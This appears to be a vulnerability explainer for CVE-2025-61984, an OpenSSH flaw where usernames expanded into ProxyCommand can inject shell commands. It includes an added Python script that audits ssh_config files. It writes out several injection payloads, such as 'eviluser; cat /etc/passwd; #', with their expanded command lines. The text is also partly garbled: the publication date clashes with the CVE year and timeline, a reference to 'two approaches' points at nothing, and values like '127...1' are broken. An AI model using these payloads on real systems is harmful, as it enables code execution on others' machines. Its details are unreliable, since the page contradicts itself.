Published: June 2024
Severity: High
Affected: OpenSSH < 10.1
CVE: CVE-2025-61984 (MITRE)
What is CVE-2025-61984?
CVE-2025-61984 is a critical vulnerability found in OpenSSH versions before 10.1. It allows attackers to inject control characters into SSH usernames. If a ProxyCommand is used in the SSH configuration, these control characters can be exploited to execute arbitrary code on the client machine.
- The SSH config uses ProxyCommand and passes the %u (username) token.
- The username value includes special control characters (like newlines or tabs) that break out of the expected command structure.
```
Host *
    ProxyCommand /bin/ssh-proxy %u
```
*The first two approaches are potentially dangerous if the username isn't trusted.*
If control characters are embedded in the username (e.g. newline \n, backticks, or shell metacharacters), and ProxyCommand isn't careful with quoting, it’s possible to "break out" of the intended command and add malicious code.
Suppose you have this in your ~/.ssh/config:
```
Host badhost
    HostName target.example.com
    ProxyCommand proxy-helper %u %h %p
```
The ProxyCommand might execute a shell command:
```
proxy-helper username hostname port
```
If an attacker can make you SSH with a username like
```
eviluser; cat /etc/passwd; #
```
or
```
eviluserid
```
or with a control character like newline (\n) that splits the command, you end up running more than intended.
Malicious command line:
```bash
ssh 'eviluser; touch /tmp/hacked;'@badhost
```
If ProxyCommand is not properly quoted, it gets expanded as
```
proxy-helper eviluser; touch /tmp/hacked; target.example.com 22
```
- proxy-helper eviluser (first command)
- touch /tmp/hacked; target.example.com 22 (second command)
Attackers can do much worse, like running curl to download malware.
```
HostName 127...1
ProxyCommand /bin/echo %u
```
```bash
ssh 'user; echo "pwned" > ~/owned.txt; #'@exploit
```
```bash
/bin/echo user; echo "pwned" > ~/owned.txt; # 127...1 22
```
This will create a file ~/owned.txt with the text "pwned" in it.
If a real ProxyCommand script blindly passes the username to subprocesses or to sh -c, real code execution can happen.
Mitigation & Patch Status
- OpenSSH 10.1 and above: Patched. It now filters or escapes usernames from untrusted sources before expanding them into ProxyCommand.
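To find configurations that meet the conditions described above, this added example (not code from OpenSSH or from the original page) scans ssh_config text for ProxyCommand lines that expand a username token and checks a username against an allowlist. The function names, the allowlist policy and the sample config are assumptions; `%r` is checked alongside the page's `%u` because ssh_config(5) documents it as the remote username token.

```python
import re

# Username tokens to look for: %u is the one this page names; %r is the
# remote-user token documented in ssh_config(5) (added here as an assumption
# about what you also want flagged).
USER_TOKENS = ("%u", "%r")

# Assumed allowlist policy for usernames that reach a ProxyCommand.
# fullmatch (not match + "$") is used so a trailing newline cannot slip through.
SAFE_USERNAME = re.compile(r"[A-Za-z0-9_.@-]+")

def username_is_safe(name):
    """True only for names with no control, whitespace or shell metacharacters."""
    return not name.startswith("-") and SAFE_USERNAME.fullmatch(name) is not None

def audit_config(text):
    """Return (line_no, host_pattern, token) for each ProxyCommand expanding a username."""
    findings, host = [], "(global)"
    for line_no, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        # ssh_config accepts both "Keyword value" and "Keyword=value".
        parts = re.split(r"[\s=]+", line, maxsplit=1)
        key, value = parts[0].lower(), parts[1] if len(parts) > 1 else ""
        if key in ("host", "match"):
            host = value
        elif key == "proxycommand":
            expanded = value.replace("%%", "")  # "%%" is a literal percent sign
            findings += [(line_no, host, t) for t in USER_TOKENS if t in expanded]
    return findings

# Constructed sample config, built from the snippets shown on this page.
SAMPLE_CONFIG = """\
Host badhost
    HostName target.example.com
    ProxyCommand proxy-helper %u %h %p
Host jump
    ProxyCommand=nc %h %p
Host literal
    ProxyCommand printf 100%%u
Host *
    ProxyCommand /bin/ssh-proxy %u
"""

if __name__ == "__main__":
    for line_no, host, token in audit_config(SAMPLE_CONFIG):
        print(f"line {line_no}: Host {host}: ProxyCommand expands {token}")
    for name in ("alice", "eviluser; touch /tmp/hacked;", "user\nid"):
        print(repr(name), "safe" if username_is_safe(name) else "REJECT")
```

Point `audit_config` at the contents of `~/.ssh/config` and any included files; a finding means the username reaches the ProxyCommand line and should be constrained or the token removed.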
In Summary
CVE-2025-61984 is a real-world example of how small mistakes in input validation and command handling can open the door to serious security problems. If you’re using OpenSSH’s ProxyCommand and not controlling your usernames, your system may be at risk. Upgrade to OpenSSH 10.1 as soon as possible, and always be careful with any values that enter your ProxyCommand!
Stay safe, double-check your SSH config files, and keep your tools up to date!
Disclaimer: Provided information is for educational purposes only. Do not use this knowledge for unauthorized activities.
Timeline
Published on: 10/06/2025 19:15:36 UTC
Last modified on: 11/11/2025 15:15:36 UTC